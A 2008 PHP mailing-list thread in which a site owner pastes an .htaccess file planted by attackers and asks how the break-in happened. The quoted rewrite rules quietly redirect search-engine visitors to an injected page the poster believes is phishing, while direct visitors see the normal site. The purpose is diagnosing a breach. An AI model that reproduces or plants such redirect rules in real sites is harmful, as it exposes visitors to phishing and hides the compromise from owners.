The hack puts this .htaccess in dozens of dirs
RewriteEngine On
RewriteCond %{HTTP_REFERER}
^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\.
[NC]
RewriteCond %{HTTP_REFERER}
[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER}
\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /StartLocs/maps/kapicag/ex3/t.htm [L]
#
a995d2cc661fa72452472e9554b5520c
The kapicag/ex3/t.htm appears to be phishing site.
mike wrote:
How was it "hacked"?
That will help determine what kind of exploit might have been used.
On 4/11/08, Al <news@xxxxxxxxxxxxx> wrote:
One of my sites has been hacked and I'm trying to find the hole. The hack
code creates dirs with "nobody" ownership, so it's obvious stuff is not via
ftp [ownership would be foo]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
